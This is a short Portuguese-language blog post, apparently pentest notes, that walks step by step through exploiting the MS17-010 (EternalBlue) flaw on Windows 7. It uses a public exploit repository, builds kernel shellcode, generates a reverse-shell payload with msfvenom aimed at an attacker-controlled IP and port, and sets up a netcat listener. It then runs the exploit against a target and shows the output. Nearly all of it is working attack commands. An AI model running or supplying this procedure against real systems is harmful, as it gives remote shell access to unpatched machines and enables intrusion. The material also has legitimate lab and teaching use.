MS17-010 - Exploiting Manually

Posted on Fri, Jul 1, 2022 windows

Abaixo um passo a passo para exploração da vulnerabilidade MS17-010 (EternalBlue/DoublePulsar).

Utilizaremos os exploits do repositório: https://github.com/worawit/MS17-010.git

  1. Clonando o Repositório
root@kali# git clone https://github.com/worawit/MS17-010.git
Cloning into 'MS17-010'...
remote: Enumerating objects: 183, done.
remote: Total 183 (delta 0), reused 0 (delta 0), pack-reused 183
Receiving objects: 100% (183/183), 113.61 KiB | 391.00 KiB/s, done.
Resolving deltas: 100% (102/102), done.
  1. Gerando o Payload (Atenção para a plataforma a ser atacada, 64 ou 32 bits)
root@kali# nasm -f bin MS17-010/shellcode/eternalblue_kshellcode_x64.asm -o \
           ./sc_x64_kernel.bin
  1. Shellcode (Atenção para a plataforma a ser atacada, 64 ou 32bits)

root@kali# msfvenom -p windows/x64/shell_reverse_tcp LPORT=<PORTA_NC_ATACANTE> \
           LHOST=<IP_NC_ATACANTE> \
           --platform windows -a x64 --format raw -o sc_x64_payload.bin
No encoder or badchars specified, outputting raw payload
Payload size: 460 bytes
Saved as: sc_x64_payload.bin
  1. Juntando o Payload e o Shellcode
root@kali# cat sc_x64_kernel.bin sc_x64_payload.bin > sc_x64.bin
  1. Explorando
    1. Em um Terminal abrir o Listener na porta escolhida do Reverse Shell acima

    root@kali# nc -lnvp <PORTA_NC_ATACANTE>

    b. executar o exploit

    root@kali# python MS17-010/eternalblue_exploit7.py <IP_MAQUINA_ALVO> sc_x64.bin
shellcode size: 1232
numGroomConn: 13
Target OS: Windows 7 Professional 7601 Service Pack 1
SMB1 session setup allocate nonpaged pool success
SMB1 session setup allocate nonpaged pool success
good response status: INVALID_PARAMETER
done

Abaixo segue algumas referências que utilizei e podem ser de ajuda:

MS17-010 EternalBlue Manual Exploitation

In this post we'll see how EternalBlue (MS17-010) can be exploited manually by compiling the payload from source and running it against a vulnerable target. This is useful in situations where Metasploit is not available or not an option, like running quick demos or exploiting from C2 hosts.

https://root4loot.com/post/eternalblue_manual_exploit/

Exploiting MS17-010 without Metasploit (Win XP SP3)

In some ways this post is an aberration, I had intended to look do a post on exploiting the infamous MS08-067 without Metasploit but did not manage to get my hands on a Win XP VM with that vulnerability. This was after I was trying to do a PTP lab but was burning too many...

https://ivanitlearning.wordpress.com/2019/02/24/exploiting-ms17-010-without-metasploit-win-xp-sp3/